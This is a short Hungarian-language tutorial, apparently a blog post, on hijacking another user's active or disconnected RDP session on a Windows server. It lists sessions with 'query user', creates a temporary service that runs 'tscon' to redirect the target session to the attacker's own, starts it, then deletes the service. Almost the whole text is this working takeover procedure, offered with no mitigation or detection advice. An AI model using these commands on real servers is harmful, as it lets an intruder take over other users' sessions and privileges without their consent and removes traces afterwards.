RDP session ellopása Windows szerveren

A következő leírás egy Windows “feature”-re hívja fel a figyelmet és bemutatja az éppen aktív, vagy inaktív RDP session ellopásának egyszerű folyamatát.

Indítsunk egy PowerShell-t és az első teendőnk, hogy kilistázzuk az felhasználókat:

query user

Ezt követően két fontos információt kell leolvasni a kimenetről:

• A felhasználó azonosítója, akitől el akarjuk lopni a session-t
• A mi session nevünk (sessionname)

 
USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 administrator                             1  Disc            1  3/12/2017 3:07 PM
>localadmin            rdp-tcp#55          2  Active          .  3/12/2017 3:10 PM

Csináljunk egy új szolgáltatást például asdTeszt néven és helyettesítsük be a fenti adatokat a megfelelő helyre:

New-Service -name asdTeszt -BinaryPathName “cmd /k tscon 1 /dest:rdp-tcp#55“

Indítsuk el a létrehozott alkalmazást, hogy eltulajdonítsuk a session-t:

sasv asdTeszt

Miután végeztünk töröljük a létrehozott szolgáltatást:

sc.exe delete asdTeszt